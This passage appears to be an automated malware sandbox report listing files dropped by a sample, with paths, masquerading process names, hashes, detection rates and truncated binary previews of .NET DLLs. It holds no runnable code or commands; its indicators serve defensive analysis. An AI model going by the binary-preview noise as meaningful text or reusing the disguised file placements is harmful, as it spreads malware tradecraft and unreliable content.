Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XwvpSNWN.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZQiVzhgV.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aGreoIOy.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\bbEWzzMV.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\c027a09a2be5ac

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with very long lines (669), with no line terminators
Category:	dropped
Size (bytes):	669
Entropy (8bit):	5.8910255377444525
Encrypted:	false
SSDEEP:	12:9mZVj4ZknQVCZFCCMtmH0nmkNFQDSwPUiBZjMWfTAsCRYO31E04xt2i3oJ2ow+4c:oW/CZECnWe/PxhCyOe0Et7oJtjk8
MD5:	943A86493AB1A67B8DBF2F2C21F277D5
SHA1:	D7F0D9D1A176A06FF6835914476F0DF6ADD5D8B6
SHA-256:	46BA0396837FF619B2BB1E588E937A5C308631ABF895C222515527962A0132EB
SHA-512:	6B1757E54C115F65AD18307388ADFC7FF4F5E4DAB004510B086391EEC4BB880AB48E84B7162B64D0D54404584BA1EB0C1480A3FD560C111BF8F2C5958FEDCD96
Malicious:	false
Preview:	i7TYpVw6RpCkp7oJ9UEHHMfGEuXgWgL9C9asjVMp8zxrTf9S7VRBdXiWbMT58QkueCiqg6joIZIRYyxiuEiAPJgpbEQXBQqrPDMQ7SwBwm3DOQ7nZvK4sjeVf2PbpMm1tbBUmhkcShOmQdaKGm7QFw9qi0uFDUVkABTxOnB2KslKU2FCcFUDOWv7bVvvwfZ8MnmOJm5dlFFXKyVqvrm79SVnPWW31QFpTn8qP03zJ1bJRYwm9E9E2b84S98wQBmV9aDh0ob4yxyI0MV1kt4wQAw2oEYQ2GjIPGJ0VPwUnEQFm0DFnHMgGzE8oK2wQKCsNq2uCfgU7kJMuqPyASnu4CBaBKMKXADdBh167TDIl1jgp2O75Ev7hRyKpcs1SV76gpKMzT0qPfJCceuI6PPSOG6ttqRelLzP3mA9sBIlOFrBIvrKsj5CGosZtadIBVFEp3I0eua5HnEJY4l78GwBQxIP4kQRh9k29nWOn1q8J94djjBzzfJ5iEy1u363eIXHDLJvhWUHZx1Q2ppUjacC0oU4yedt5weBlwaXZPRcLCfuNh9FOlUDpVRY1O6D3lLmT0pFOR4TI91xJjrRfYfTcaVPfCgLSOjj02bW2407rA4qedPSgpifG1K2fZkMvtA4aR7QHUZkhhmbgpvBwNonqEd9ri1cU

C:\Users\user\Desktop\eIOeVPZc.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\eTxcBbyX.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eoPexdBD.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fdKvAzJi.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\gHPdZtTT.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gmTMvKjO.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\jLivJUwn.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\kEMLjtbD.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\koiTwEAQ.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kxFTgqTN.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\lHNctDZP.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mTPcyfdR.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mwFSlUNE.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nRXThXRl.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\njHMYZdD.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
